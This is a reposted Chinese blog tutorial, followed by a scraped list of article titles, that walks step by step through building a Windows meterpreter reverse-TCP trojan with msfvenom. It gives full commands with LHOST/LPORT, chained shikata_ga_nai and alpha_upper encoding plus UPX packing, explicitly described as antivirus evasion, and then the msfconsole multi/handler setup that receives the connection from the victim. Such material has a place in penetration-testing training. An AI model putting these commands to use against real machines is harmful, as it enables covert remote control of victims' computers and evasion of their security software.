利用msfvenom生成木马程序
来源:互联网 发布:恶意广告拦截软件 编辑:程序博客网 时间:2024/05/22 03:40
一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.
二,工具:MSF
三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线
四,过程:
1,查看帮助
命令: root# msfvenom -h
结果:
2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o
结果:
3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口
命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe > abc.exe
注:如果只是用msfpayload生成,简单示例:
命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.113 X > Desktop/abc.exe
多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acn.exe
upx加壳:upx -5 /root/Desktop/acn.exe
结果:
说明: -p payload
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
LHOST,LPORT 监听上线的主机IP和端口
-f exe 生成EXE格式
4,把生成的abc.exe放到win7下.执行.
5,在命令行下,打开msfconsole.
命令: root # msfconsole
6,本机监听,因为之前用的是reverse_tcp,所以设置如下
命令: msf > use exploit/multi/handler
Msf exploit(handler) > set payload windows/meterpreter/reverset_tcp
结果:
7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来.
8,.验证
转载文章请注明,转载自:小马's Blog http://www.i0day.com
- 利用msfvenom生成木马程序
- 利用msfvenom生成木马程序
- 熟悉msfvenom生成木马程序过程,并执行和监听控制.
- 利用msfvenom渗透win7
- msfvenom生成shellcode
- msfvenom 生成shellcode
- msfvenom生成各类Payload命令
- msfvenom
- msfvenom
- msfvenom
- TheFatRat:Msfvenom傻瓜化后门生成工具
- 木马程序
- 木马程序
- Metasploit应用笔记-msfvenom生成meterpreter后门代码
- 使用msfvenom生成木马用于监听别人的操作
- msfvenom参数
- msfvenom反弹
- 利用木马程序制作网页 窃取他人钱财获得刑罚
- [重写开源框架源码]InfiniteViewPager在ScrollView中不能竖直滑动问题解决
- Android CardView使用详解
- JSon实体类快速生成插件 GsonFormat
- pt-query-digest查询日志分析工具
- 编译
- 利用msfvenom生成木马程序
- superviseddescent (SDM C++11实现)环境配置
- 交叉编译器的安装方法
- ionic框架环境配置
- 20160321 CodeForces 7C Line(拓展欧几里得)
- 顺序表与单链表的比较
- Android SwipeRefreshLayout实现下拉刷新,上拉加载、滑动加载(自动加载)和点击加载
- java指导
- Carthage